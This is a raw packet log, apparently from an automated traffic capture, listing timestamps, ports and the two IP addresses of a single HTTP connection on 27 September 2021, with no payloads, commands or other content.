Sep 27, 2021 23:55:28.548366070 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.586380959 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586415052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586436987 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586458921 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586479902 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586502075 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586527109 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586550951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586571932 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586594105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586616039 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586637974 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586659908 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586680889 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586707115 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586729050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586750984 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586774111 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586795092 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586817026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586838961 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586859941 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586884022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586906910 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586927891 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586950064 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.586975098 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.589622021 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.589657068 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.589662075 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.589673042 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.626518965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626555920 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626576900 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626600027 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626621962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626646042 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626668930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626688957 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626699924 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.626712084 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626729012 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.626744986 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626758099 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626773119 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626777887 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.626786947 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.626789093 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.626792908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.626863956 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.627271891 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.662436962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662533045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662555933 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662586927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662607908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.662610054 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662631989 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662719965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662720919 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.662765026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662786007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662786961 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.662806988 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.662811995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662847996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662857056 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662874937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662890911 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.662919044 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.662964106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.662985086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.663007975 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.663022041 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.663043022 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.663063049 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.663063049 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.663096905 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.663099051 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.663131952 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.663176060 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.663194895 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.699258089 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699295044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699316978 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699337959 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699373960 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699450970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699474096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699491024 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699516058 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699549913 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699570894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699595928 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699613094 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.699619055 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699640989 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699661970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699664116 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.699682951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699692011 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.699704885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699733973 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.699776888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699803114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699826002 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699847937 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699868917 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.699927092 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.699951887 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.734761000 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.734868050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.734919071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.734958887 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735044003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735079050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735169888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735249996 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735321045 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735405922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735475063 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735527039 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735583067 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735619068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735650063 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735683918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735716105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735761881 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735821962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735850096 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735873938 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.735886097 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.735939980 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.736136913 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.736807108 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.771962881 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772053003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772134066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772178888 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772205114 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772228956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772274017 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772285938 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772305012 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772342920 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772411108 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772456884 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772480965 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772504091 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772526979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772550106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772568941 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772593021 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772665024 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772713900 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772747040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.772989035 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.773459911 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.809248924 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.809298038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.809320927 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.809340000 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.809425116 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.809510946 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.809972048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810009003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810045958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810122967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810154915 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.810190916 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810203075 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.810256004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810281038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810328007 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810405970 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810442924 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810478926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810503006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810606956 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810642958 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810678959 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810703039 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810748100 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810771942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810791969 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810806990 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.810813904 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.810828924 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.810834885 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.810858011 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.844090939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.844141006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.844166040 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.844192982 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.844737053 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.844779968 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.844855070 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.844892979 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845066071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845227003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845254898 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845278025 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845350981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845387936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845454931 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845530033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845608950 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845629930 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845666885 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845729113 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845752001 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845838070 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845860004 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.845881939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.858550072 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.893481016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.893526077 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.893620014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.893727064 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.893754959 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.893810034 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.893835068 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.893896103 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.893946886 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.893971920 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.893995047 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894053936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894098043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894120932 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894145012 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894190073 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894217968 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894242048 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894264936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894329071 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894350052 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.894378901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.910413027 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.945121050 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945169926 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945197105 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945221901 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945245981 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945277929 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945302963 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945326090 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945452929 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945482016 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945504904 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945530891 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945555925 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945580006 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.945604086 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.949064970 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.949111938 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.984173059 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.985785961 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.985872030 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.985891104 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.985909939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.985928059 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.985946894 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.985965014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.985982895 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.986000061 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.986017942 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.986033916 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.986051083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.986069918 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.986088991 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.986112118 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:28.989502907 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:28.989538908 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.024405003 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.025656939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.025708914 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.025742054 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.025758982 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.025791883 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.025808096 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.025867939 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.025886059 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.025902033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.025916100 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.025940895 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.025969028 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.026026964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.026151896 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.026227951 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.026257038 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.026283026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.026307106 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.026346922 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.026365995 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.026482105 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.060636044 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.060698986 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.060755014 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.060802937 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.060811043 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.060837030 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.060852051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.060914993 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.060929060 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.060961962 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061001062 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061017036 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.061295033 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061387062 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.061398029 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061419964 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061454058 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061486006 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.061495066 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061534882 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061542034 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.061574936 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061613083 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061624050 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.061660051 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.061709881 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.098088026 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098144054 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098206997 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098223925 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.098251104 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098289967 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098320007 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.098455906 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098500013 CEST	80	49745	185.138.164.150	192.168.2.3
Sep 27, 2021 23:55:29.098532915 CEST	49745	80	192.168.2.3	185.138.164.150
Sep 27, 2021 23:55:29.098539114 CEST	80	49745	185.138.164.150	192.168.2.3
